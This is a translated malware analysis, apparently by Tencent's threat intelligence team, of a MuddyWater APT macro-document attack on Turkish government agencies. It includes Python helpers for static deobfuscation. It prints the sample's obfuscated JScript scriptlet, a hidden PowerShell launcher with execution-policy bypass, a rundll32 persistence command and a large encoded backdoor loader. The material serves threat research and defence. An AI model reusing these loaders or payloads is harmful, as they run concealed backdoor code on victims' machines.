[Original research] MuddyWater APT group's targeted attack on Turkish government agencies

Tencent PC Manager (腾讯电脑管家)
Posted 2018-7-23 16:27:16
0x1 Overview
Tencent Yujian Threat Intelligence Center recently captured another attack sample from the MuddyWater APT group. As with the samples captured in March 2018, the target is once again Turkey. Delivery again relies on a macro document; an icon file is embedded in the document, its keyword is "mersin emniyet müdürlüğü", and a search-engine query shows it to be the icon of a Turkish government agency, so this is presumably a targeted attack against that agency.
On the technical side the group again uses PowerShell scripts that have been obfuscated several times over, throughout the whole chain. Compared with the previous campaign, some of the key trojan functions are now triggered only by PowerShell scripts pushed down from the cloud-side C2, which makes forensics considerably harder for security teams. As for C2, rather than the lavish 517 C2 addresses used last time, this sample uses only 3. A detailed analysis of the sample follows.
(Attack flow diagram)
To summarise the technical characteristics of this new MuddyWater APT sample:
i. Target: Turkish government agencies; the goal is to accept cloud control, download and drop a backdoor, and collect sensitive information;
ii. Multiple layers of heavily obfuscated PowerShell scripts;
iii. Some key functions are triggered only by PowerShell scripts pushed down from the C2, which keeps the activity extremely quiet and hard to capture;
iv. The captured sample uses only 3 C2 addresses;
v. Once running, the script sets up autostart, decrypts the C2 addresses, creates a scheduled task and collects computer information, then polls the C2 continuously, waiting for and executing new commands.
0x2 Payload delivery
The background of the macro document is deliberately blurred, while the Turkish-language prompt to enable macros is unusually bright. This is a classic social-engineering technique: the aim is to get a curious victim to click "Enable Content", which lets the trojan embedded in the document run.
The VBA project of the decoy document is password-protected, so a password prompt appears when trying to view the macro. After breaking the protection we obtained the heavily obfuscated VBA script.
(VBA script)
The VBA contains four base64-encoded strings; decoding them shows that they match the contents of OneDrive.dll, OneDrive.html and OneDrive.ini, which are dropped into C:\ProgramData.
(Files dropped by the VBA)
The four base64 strings in the VBA are shown below:
(Base64 string 1)
(Base64 string 2)
(Base64 string 3)
(Base64 string 4)
0x3 RAT analysis
OneDrive.html analysis
The file's contents are shown below. Despite the .html extension it is the INF that the command "c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\OneDrive.html,OneDrive,1," (listed under the autostart entries in the IOC section) feeds to advpack.dll; the file and the command together exist to keep the implant resident.
(Contents of OneDrive.html)
OneDrive.dll analysis
This "dll" is not a PE file but a Windows Script Component (scriptlet) carrying JScript; its contents are as follows.
<?xml version="1.0" encoding="utf-8"?>
<package>
  <component>
    <registration progid="y">
      <script language="JScript"><![CDATA[
var a=['wq3DhcOQw6A=','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','w53DoMKQIgTCqj7Cg8Oh','wrTDm3Q=','w6luw4jDkSXCksOnw4TDuW1bw4BVIsO2w6zChQrClnE=','X8K0NsO9woVWdDPDpQIqw7hUZg==','wpjCk0MpPsOWw73DmDVD','w7MnTlPCqcKYd8O1Bg==','w7zCrsOR','KXrDkcKffQZwdkl1eBx2','wqbCh8OIwofCtCU='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1c4));var b=function(c,d){c=c-0x0;var e=a[c];if(b['mtNPvA']===undefined){(function(){var f;try{var g=Function('return (function() '+'{}.constructor("return this")( )'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,s){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+s['charCodeAt'](A%s['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['yrYnwx']=q;b['VjLgMC']={};b['mtNPvA']=!![];}var C=b['VjLgMC'][c];if(C===undefined){if(b['LYvtJw']===undefined){b['LYvtJw']=!![];}e=b['yrYnwx'](e,d);b['VjLgMC'][c]=e;}else{e=C;}return e;};var cm=b('0x0','1(n^');var w32ps=GetObject(b('0x1','@#1j'))[b('0x2','rZ%W')](b('0x3','CaVK'));w32ps[b('0x4','nOAS')]();w32ps[b('0x5','2*bW')]=0x0;var rtrnCode=GetObject(b('0x6','mISm'))[b('0x7','5Kh]')](b('0x8','q!&J'))[b('0x9','r@qO')](cm,b('0xa','1(n^'),w32ps,null);
          ]]></script>
    </registration>
  </component>
</package>
After de-obfuscation, the code in OneDrive.dll reduces to the following; its job is to have PowerShell decode the encoded payload in OneDrive.ini and execute it.
// Decode OneDrive.ini with the custom base-52 routine and run the result with iex
var cm = 'powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\OneDrive.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));';
// Spawn it through WMI with a hidden window (ShowWindow = 0 is SW_HIDE)
var w32ps = GetObject('winmgmts:')['Get']('Win32_ProcessStartup');
w32ps['SpawnInstance_']();
w32ps['ShowWindow'] = 0x0;
// Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId)
var rtrnCode = GetObject('winmgmts:')['Get']('Win32_Process')['Create'](cm, 'c:\\', w32ps, null);
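The strings in the scriptlet above are hidden by the common string-array-plus-RC4 scheme: every literal is stored base64-encoded in the array `a`, the array is rotated 0x1c4 times on load (452 rotations of an 11-entry array amount to a single shift), and `b(index, key)` base64-decodes the entry, reads the bytes as UTF-8 and RC4-decrypts them with the per-call key. The following Python is an added example, not code from the sample or from Tencent, that re-implements that pipeline so the strings can be recovered statically. The array it decodes is constructed here by re-encrypting the already-known plaintext strings (the simplified code above) under the page's own per-call keys, because one entry of the original array is not reproduced on this page.

```python
"""Recover the strings hidden by the string-array + RC4 pattern in OneDrive.dll.
Added example; the sample array below is constructed, not copied from the scriptlet."""
import base64


def rotate_array(arr, count):
    """Replay `(function(c,d){...while(--f){c.push(c.shift())}...}(a, count))`.
    The obfuscator calls e(++d), so the loop body runs exactly `count` times."""
    k = count % len(arr)
    return arr[k:] + arr[:k]


def unrotate_array(arr, count):
    """Inverse of rotate_array; used only to build the constructed sample."""
    k = count % len(arr)
    return arr[len(arr) - k:] + arr[:len(arr) - k]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA xor), i.e. the `q` function in the scriptlet. Symmetric."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decode_string(cell: str, key: str) -> str:
    """b(index, key): atob -> %XX escape -> decodeURIComponent -> RC4.
    decodeURIComponent over %XX-escaped bytes is just a UTF-8 decode, and the
    RC4 step works on charCodeAt values, which are all below 0x100."""
    cipher_chars = base64.b64decode(cell).decode("utf-8")
    cipher = bytes(ord(c) for c in cipher_chars)
    return rc4(key.encode("latin-1"), cipher).decode("latin-1")


def encode_string(plain: str, key: str) -> str:
    """Inverse of decode_string; only needed to construct the sample array."""
    cipher = rc4(key.encode("latin-1"), plain.encode("latin-1"))
    return base64.b64encode("".join(map(chr, cipher)).encode("utf-8")).decode("ascii")


def resolve_calls(rotated, calls):
    """calls: (hex_index, key) pairs exactly as written in the script, e.g. ('0x3', 'CaVK')."""
    return [decode_string(rotated[int(idx, 16)], key) for idx, key in calls]


# The eleven b(index, key) calls in the order the scriptlet makes them.
CALLS = [("0x0", "1(n^"), ("0x1", "@#1j"), ("0x2", "rZ%W"), ("0x3", "CaVK"),
         ("0x4", "nOAS"), ("0x5", "2*bW"), ("0x6", "mISm"), ("0x7", "5Kh]"),
         ("0x8", "q!&J"), ("0x9", "r@qO"), ("0xa", "1(n^")]
CM = ("powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\OneDrive.ini);"
      "$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);"
      "if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}"
      "$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));")
PLAIN = [CM, "winmgmts:", "Get", "Win32_ProcessStartup", "SpawnInstance_", "ShowWindow",
         "winmgmts:", "Get", "Win32_Process", "Create", "c:\\"]
ROTATION = 0x1c4
# Constructed sample array: encrypted under the page's keys and stored "unrotated",
# so that the obfuscator's 0x1c4 rotations bring it back into call order.
SAMPLE_ARRAY = unrotate_array(
    [encode_string(p, k) for p, (_, k) in zip(PLAIN, CALLS)], ROTATION)


def deobfuscate_sample():
    """What a static pass over the scriptlet yields: the strings in call order."""
    return resolve_calls(rotate_array(SAMPLE_ARRAY, ROTATION), CALLS)


if __name__ == "__main__":
    for (idx, key), s in zip(CALLS, deobfuscate_sample()):
        print(f"b({idx!r}, {key!r}) -> {s[:60]!r}")
```

Against a real sample, replace SAMPLE_ARRAY with the literal array from the scriptlet and CALLS with the b(...) pairs as they appear; the rotation constant is the second argument of the self-invoking function.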
OneDrive.ini analysis
Decoding the contents of OneDrive.ini yields the following PowerShell script.
iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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
l/311/+Bw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
The PowerShell in OneDrive.ini first decompresses a base64-encoded script and then executes it. The decompressed script is shown below (only part of it, as the code is very long); it has gone through several layers of heavy obfuscation.
After several rounds of de-obfuscation, the PowerShell in OneDrive.ini finally yields the PowerShell backdoor itself.
(Final backdoor script from OneDrive.ini)
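Stripping that stage by hand is tedious, and the same wrapper tends to recur at every layer. The following Python is an added example (not code from the sample or from Tencent) that pulls the FromBase64String literal out of such a one-liner, inflates it as raw DEFLATE (the .NET DeflateStream format, which zlib handles with negative wbits) and repeats while the result is itself another such loader. The sample it unpacks is built inside the block from a constructed inner script; the helper that builds it exists only to make the example self-contained.

```python
"""Unpack the base64 + DeflateStream loader stage found in OneDrive.ini.
Added example, not code from the sample or from Tencent."""
import base64
import re
import zlib

# Matches the literal inside [Convert]::FromBase64String('...'); whitespace is
# allowed because forum posts and document extraction wrap long blobs across lines.
STAGE_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)")


def inflate_stage(ps_text: str) -> str:
    """Return the script that iex(...ReadToEnd()) would execute, without running it."""
    m = STAGE_RE.search(ps_text)
    if m is None or "DeflateStream" not in ps_text:
        raise ValueError("not a FromBase64String + DeflateStream loader")
    blob = re.sub(r"\s+", "", m.group(1))
    raw = base64.b64decode(blob, validate=True)
    try:
        # .NET DeflateStream is raw DEFLATE with no zlib header: negative wbits.
        inner = zlib.decompress(raw, wbits=-zlib.MAX_WBITS)
    except zlib.error as exc:
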